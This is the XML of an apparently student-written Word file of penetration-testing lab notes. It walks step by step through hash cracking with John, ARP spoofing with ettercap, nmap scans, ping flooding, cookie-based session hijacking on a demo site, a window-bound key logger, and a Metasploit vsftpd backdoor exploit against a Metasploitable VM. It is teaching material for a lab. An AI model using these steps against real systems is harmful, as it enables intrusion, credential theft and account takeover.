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06B6F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PRATICAL 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F967CA8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open terminal in kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39121F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step 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1  -</w:t>
      </w:r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whois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nvidia.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477907FA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step 2 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-  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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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apt install 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whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0933DE10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step 3 - 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whois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nvidia.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DAAFEE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step 4 - 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nslookup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nvidia.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519C0611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step 5 - dig nvidia.com -&gt; here final out put </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A19463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</w:rPr>
        <w:t>in kali setting network adpt1 NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C68E7A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PRATICAL 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54C978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in kali setting network adpt1 NAT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1D0D7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first (B) open terminal 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r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 kali command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375B68C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step 1 - john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E90F06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step 2 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-  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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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apt install john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F21DD0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step 3 - echo -n password123 | md5sum -&gt; we will get 482c811da5d5b4bc6d497ffa98491e38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E9D17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step 4 - nano hash.txt -&gt; paste the 482c811da5d5b4bc6d497ffa98491e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38  after</w:t>
      </w:r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paste do -&gt; Ctrl + O, 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Enter ,Ctrl</w:t>
      </w:r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+ X </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D3DBE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</w:rPr>
        <w:t>step 5 - ls /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usr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</w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E867951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step 6 - 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sudo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gunzip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/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usr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</w:rPr>
        <w:t>/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8E35B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</w:rPr>
        <w:t>step 7 - john --format=raw-md5 --wordlist=/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usr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/share/wordlists/rockyou.txt hash.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C66E61D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step 8 - john --format=raw-md5 --show hash.txt -&gt; here the final output </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0296A807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then (A) now open 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>cryp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 Tool 1.42 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>eng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 version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B8BE93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step 1 - File → New</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127409CA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step 2 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-  password</w:t>
      </w:r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</w:rPr>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A84295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step 3 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-  go</w:t>
      </w:r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to upper layer we can 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see  -</w:t>
      </w:r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</w:rPr>
        <w:t>&gt; Encrypt/Decrypt → Symmetric → RC4 → Encrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F0A72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step 4 - then 128 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bts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-&gt; Encrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1099B8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step 5 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-  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repte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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the step -&gt; Encrypt/Decrypt → Symmetric → RC4 → Decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE60DAD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step 6 - then 128 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bts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-&gt; Decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA753A1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step 7 - password123 -&gt; here the final out put </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274020A8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6231865A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571445AA" w14:textId="77777777" w:rsid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091987E1" w14:textId="14ECAF78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  <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PRATICAL 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>3:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="337E74A4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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>BEFORE STARTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D905F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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>Make sure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA8495A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 Kali Adapter 1 → Host-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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>OnlyMetasploitable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 Adapter 1 → Host-Only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6212EE6A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step 1 - On Kali: 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ip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a or -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ifconfig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-&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5147DB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step 2 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-  Switch</w:t>
      </w:r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to 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Metasploitable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: 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ifconfig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-&gt; command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E4CE3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step 3 - On Kali:  ping (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metaplote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ip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 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addrr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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will come in 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this )</w:t>
      </w:r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-&gt; command in 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metasplote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the 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ip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addrr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copy in ping then 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adrr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then ctrl +c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19188060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</w:rPr>
        <w:t>step 4 - On Kali: netstat -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antpl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-&gt; command if not found then -&gt;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sudo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apt install net-tools -&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01A988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step 5 - on kali: traceroute 192.168.56.102 -&gt; command this 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metalope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ipaddrs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if not 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install :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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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apt install traceroute -&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1AB42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step 6 - On Kali: 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sudo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sysctl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-w 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net.ipv4.ip</w:t>
      </w:r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_forward=1 -&gt; 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command ,</w:t>
      </w:r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verify, cat /proc/sys/net/ipv4/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ip_forward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-&gt;command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A3EF8B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step 7 - On Kali: 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sudo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ettercap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-T -q -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i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eth0 -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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arp:remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/here the gate way//here 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ipaddr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metasployt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</w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029AF44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step 8 - On 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Metasploitable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: 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arp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-n -&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A35A2A3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step 9 -On Kali (new terminal): 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sudo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wireshark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-&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD2660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</w:rPr>
        <w:t>step 10 - Select eth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0  -</w:t>
      </w:r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Start capture- In display filter bar type: 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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BA5FE93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step 11 - On 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Metasploitable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: ping 192.168.56.101 &lt;-the ping of kali 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ifconfig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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A24351B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PRATICAL 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>4:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A160F46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step 1 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-  Identify</w:t>
      </w:r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Target IP (On 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Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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),Login</w:t>
      </w:r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to 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Metasploitable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2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ifconfig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 &lt;</w:t>
      </w:r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- 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command ,Look</w:t>
      </w:r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for: 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inet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addr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: 192.168.192.129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B54A854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step 2 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-  ping</w:t>
      </w:r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192.168.192.129 &lt;-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command ,If</w:t>
      </w:r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you receive replies:64 bytes from 192.168.192.129 then CTRL + C -&gt;Verify Connectivity (On Kali Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA6552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step 3 - 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sudo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nmap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-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sS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192.168.192.129 &lt;- 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command ,SYN</w:t>
      </w:r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Scan (Stealth Scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149DED95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step 4 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-  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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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nmap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-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sA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192.168.192.129 &lt;- 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command ,ACK</w:t>
      </w:r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Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B02B19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step 5 - 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sudo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nmap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-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sF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192.168.192.129 &lt;- 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command ,FIN</w:t>
      </w:r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Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467219E0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step 6 - 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sudo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nmap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-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sN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192.168.192.129 &lt;- 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command ,NULL</w:t>
      </w:r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Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22577E45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step 7 - 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sudo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nmap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-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sX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192.168.192.129 &lt;- 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command ,XMAS</w:t>
      </w:r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Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1193D305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step 8 - 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sudo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nmap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-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sS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-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sV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192.168.192.129 &lt;- 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command ,</w:t>
      </w:r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Service Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2591C1" w14:textId="77777777" w:rsid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17DBDF1C" w14:textId="77777777" w:rsid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61BA236A" w14:textId="77777777" w:rsid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3A292802" w14:textId="690AE32D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  <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRATICAL :</w:t>
      </w:r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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F09EC1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step 1 - on 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kali ,</w:t>
      </w:r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ifconfig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 &lt;</w:t>
      </w:r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- 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command ,Identify</w:t>
      </w:r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IP Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45073DA3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step 2 - On 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Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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: ,</w:t>
      </w:r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ifconfig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 &lt;</w:t>
      </w:r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</w:rPr>
        <w:t>-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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41D462CB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step 3 -Verify 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Connectivity ,</w:t>
      </w:r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From Kali: ping 192.168.192.129 &lt;- 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command ,If</w:t>
      </w:r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replies are received:64 bytes from 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192.168.192.129 ,</w:t>
      </w:r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Network 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working :CTRL</w:t>
      </w:r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+ C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDED1A7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step 4 - Start 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Wireshark ,On</w:t>
      </w:r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Kali: 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sudo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wireshark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  &lt;- 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command ,Select</w:t>
      </w:r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interface: eth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0 ,</w:t>
      </w:r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Click Start Capturing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DA737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step 5 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-  Generate</w:t>
      </w:r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Normal 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Traffic ,</w:t>
      </w:r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Open new terminal in Kali: ping 192.168.192.129 &lt;- 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command ,Let</w:t>
      </w:r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it run for 10–15 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4E7FC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step 6 - Stop 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Capture ,</w:t>
      </w:r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Go</w:t>
      </w:r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back to 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Wireshark  ,</w:t>
      </w:r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Click Red Stop Button &lt;- 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command ,</w:t>
      </w:r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14:paraId="1B6483E5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step 7 - Analyze Normal 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Traffic ,</w:t>
      </w:r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Apply filter in Wireshark: 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icmp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&lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A249765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step 8 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-  Generate</w:t>
      </w:r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Fast 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Traffic ,</w:t>
      </w:r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ping -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i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0.01 192.168.192.129 &lt;- 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command ,</w:t>
      </w:r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Let</w:t>
      </w:r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it run for 20–30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0E82A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step 9 - Capture During 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Simulation ,</w:t>
      </w:r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Start</w:t>
      </w:r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new capture in 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WiresharkLet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high-speed ping run Stop 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capture ,</w:t>
      </w:r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icmp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&lt;- command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31677172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step 10 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-  Analyze</w:t>
      </w:r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DoS-Like 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Traffic ,</w:t>
      </w:r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14:paraId="6877E240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step 12 - Observe Impact on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Metasploitable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,</w:t>
      </w:r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On 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Metasploitable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</w:rPr>
        <w:t>: ping 192.168.192.102 &lt;- command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FA829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step 13 - Step 11: Stop Traffic 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On</w:t>
      </w:r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Kali:CTRL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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+ C &lt;- command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715310D9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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>PRATICAL :</w:t>
      </w:r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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA3A83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</w:rPr>
        <w:t>step 1 - Open Firefox (Legacy Version) Open Firefox version 56 or below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756379CB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step 2 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-  Install</w:t>
      </w:r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Tamper Data Extension right side upper puzzle like open it  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04446885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step 3 -Install Cookie Editor Extension </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A6EE3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step 4 - Start Tamper Data  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412CD9A0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step 5 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-  Open</w:t>
      </w:r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Target Website - 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http://techpanda.org ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70A59CD3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step 6 - Enter Credentials - Email: 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admin@google.com ,</w:t>
      </w:r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Password: Password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2010 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C7E325B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step 7 - Intercept HTTP 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Request ,</w:t>
      </w:r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OK / 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Tamper ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="305E8F85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step 8 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-  View</w:t>
      </w:r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Session Cookies - look for - PHPSESSI frontend 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session_id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14:paraId="36B4BF94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step 9 - Copy Session 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Token  ex</w:t>
      </w:r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- q2jf4n0s4lnncppoc032n72u4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a  &lt;</w:t>
      </w:r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- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F265792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step 10 - Open Private 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Window  Ctrl</w:t>
      </w:r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+ Shift + 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P  then</w:t>
      </w:r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open - http://techpanda.org &lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CFA6ED5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step 11 -Modify Cookie (Session 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Impersonation)  Open</w:t>
      </w:r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Cookie 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Editor  ,Locate</w:t>
      </w:r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session cookie Replace its value with copied token Save Refresh page &lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E7A9F57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</w:rPr>
        <w:t>step 12 - Observe Result User is logged in without entering credentials. -&gt; final output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0134980B" w14:textId="77777777" w:rsid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2BCD0F6B" w14:textId="3CED9331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  <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRATICAL :</w:t>
      </w:r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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D55628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open python 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add</w:t>
      </w:r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this code save ass keylog.txt file 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wrun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f5 education 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keyloger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37573804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import 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tkinter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as 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tk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="280CB21E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def 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key_pressed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</w:rPr>
        <w:t>(event):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A19F960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   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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log.insert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>(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tk.END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f"Key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Pressed: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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event.keysym</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>}\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21808E80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   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log.see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</w:rPr>
        <w:t>(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tk.END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</w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE787EF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root = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tk.Tk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56C7F2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root.title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>("Educational Key Event Logger")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08416CE1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label = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tk.Label</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>(root, text="Type inside this window:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FA9EAC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label.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A60965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entry = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tk.Entry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>(root, width=40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C34A86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entry.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0EC08F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entry.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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("&lt;Key&gt;", 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key_pressed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</w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE0B89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log = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tk.Text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>(root, height=10, width=50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490D5B97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log.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F7B03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root.mainloop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA2A84" w14:textId="77777777" w:rsid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58DFF9D9" w14:textId="77777777" w:rsid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23251E0D" w14:textId="77777777" w:rsid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0023F1DF" w14:textId="77777777" w:rsid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483D234A" w14:textId="77777777" w:rsid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78A871FF" w14:textId="77777777" w:rsid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7C20705E" w14:textId="77777777" w:rsid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71B9384D" w14:textId="77777777" w:rsid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66B4DBE3" w14:textId="77777777" w:rsid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7F26B67A" w14:textId="77777777" w:rsid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4F414538" w14:textId="77777777" w:rsid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009993F2" w14:textId="77777777" w:rsid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470CDB1D" w14:textId="77777777" w:rsid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1C784D62" w14:textId="77777777" w:rsid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559EDCAF" w14:textId="4AF10C79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  <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRATICAL :</w:t>
      </w:r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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A850110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if not have Metasploit 2 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>( https://sourceforge.net/projects/metasploitable/</w:t>
      </w:r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 ) goa and download after that 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>open  oracle</w:t>
      </w:r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 virtual box in tat open Metasploit then type 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>ifcofig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 -&gt;command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B869455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then ping will pop up copy to kali open kali and type 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>ifconfig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 -&gt; command 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>then ,</w:t>
      </w:r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 ping 192.168.56.102 -&gt; from Metasploit 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>ip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 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>adrr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 then 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>comtrol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 +z to exit then step 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F572B2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open 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>zenmap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 then type in target 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>ip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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>adrr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  192.168.56.102</w:t>
      </w:r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 then go to profile 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>choosee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- 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>( quack</w:t>
      </w:r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 scan plus) then click scan then wait you will connect the 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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>metasploi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 in kali  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DED34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step 1 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-  open</w:t>
      </w:r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kali type - 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msfconsole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  &lt;- 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command ,</w:t>
      </w:r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then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1DC3A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step 2 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-  then</w:t>
      </w:r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type-   search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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vsftpd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 &lt;</w:t>
      </w:r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</w:rPr>
        <w:t>-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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="312A6C1F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step 3 - then type - set RHOSTS 192.168.56.102 &lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4382ACF0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step 4 -   then type - run &lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07315E90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step 5 - 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tehn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type - use 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1  &lt;</w:t>
      </w:r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- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C0578F5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step 6 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-  then</w:t>
      </w:r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type - set RHOSTS 192.168.56.102 &lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48FDFCC9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step 7 - then type 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-  run</w:t>
      </w:r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&lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52D7842F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step 8 - then type - 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whoami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&lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30F6DEC2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step 9 - then type - </w:t>
      </w:r>
      <w:proofErr w:type="spell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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-a &lt;- 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command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="09CC9099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step 10 - then type - ls &lt;- </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F3084D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>command ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F3084D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;---- you will get out put</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D3E213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 step 11 - then type - exit &lt;- command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694B7FC" w14:textId="77777777" w:rsidR="00F3084D" w:rsidRPr="00F3084D" w:rsidRDefault="00F3084D" w:rsidP="00F3084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3084D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">step 12 - then again type - exit &lt;- command </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D197F9" w14:textId="77777777" w:rsidR="001B7972" w:rsidRPr="00F3084D" w:rsidRDefault="001B7972">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001B7972" w:rsidRPr="00F308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84D"/>
    <w:rsid w:val="000A5337"/>
    <w:rsid w:val="001B7972"/>
    <w:rsid w:val="003129CD"/>
    <w:rsid w:val="00EC4E13"/>
    <w:rsid w:val="00F3084D"/>
    <w:rsid w:val="00F51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1E9EA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A389E9D2-EA35-48B1-8592-6EDD9F7AE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084D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F30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8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8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8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8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8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8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8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8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8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8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8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8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8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8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8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8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983</Words>
  <Characters>5605</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>46</Lines>
  <Paragraphs>13</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6575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Panchal</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vikas Panchal</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-01T16:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-01T16:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>